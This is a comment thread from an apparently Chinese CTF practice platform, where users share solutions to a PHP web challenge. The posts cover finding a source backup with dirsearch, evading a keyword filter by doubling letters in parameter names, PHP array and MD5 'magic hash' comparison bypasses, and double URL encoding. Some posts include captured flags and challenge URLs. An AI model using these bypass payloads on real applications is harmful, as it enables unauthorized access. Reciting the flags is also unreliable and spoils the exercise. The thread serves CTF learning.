用dirsearch扫描发现有个index.php.bak文件,下载后可查看代码内容,需要先绕过参数名的key替换,且需满足key1、key2的值不同,但MD5值相同即可输出flag值。
?kkeyey1[%20]=a&kkeyey2[%20]=b
双重 URL 编码:%6b%65y1=240610708&%6b%65y2=QNKCDZO
flag{bfe88cf63c93ed305849b6fc64338885}
地址+?kkeyey1=QLTHNDT&kkeyey2=EEIZDOI
地址+/?kekeyy1=&kekeyy2=2
有没有大佬,为什么我访问http://114.67.175.224:18711/index.php.bak就啥也没有呢,访问不到
http://114.67.175.224:16854/?kkeyey1=240610708&kkeyey2=QNKCDZO
http://114.67.175.224:17863/?kekeyy1[]=a&kekeyy2[]=b
flag{2947e8b6ef06920918846b7c0b02de7a}
...
评论
zero9876 13小时前
举报
用dirsearch扫描发现有个index.php.bak文件,下载后可查看代码内容,需要先绕过参数名的key替换,且需满足key1、key2的值不同,但MD5值相同即可输出flag值。
dutest 1天前
举报
?kkeyey1[%20]=a&kkeyey2[%20]=b
Snngulaf 3天前
举报
双重 URL 编码:%6b%65y1=240610708&%6b%65y2=QNKCDZO
自由魂儿儿儿 9天前
举报
flag{bfe88cf63c93ed305849b6fc64338885}
2814217278 10天前
举报
地址+?kkeyey1=QLTHNDT&kkeyey2=EEIZDOI
13607979046 10天前
举报
地址+/?kekeyy1=&kekeyy2=2
chaojiikun 17天前
举报
有没有大佬,为什么我访问http://114.67.175.224:18711/index.php.bak就啥也没有呢,访问不到
welltian 18天前
举报
http://114.67.175.224:16854/?kkeyey1=240610708&kkeyey2=QNKCDZO
15290408231 22天前
举报
http://114.67.175.224:17863/?kekeyy1[]=a&kekeyy2[]=b
转生成为异世界隐藏大佬 29天前
举报
flag{2947e8b6ef06920918846b7c0b02de7a}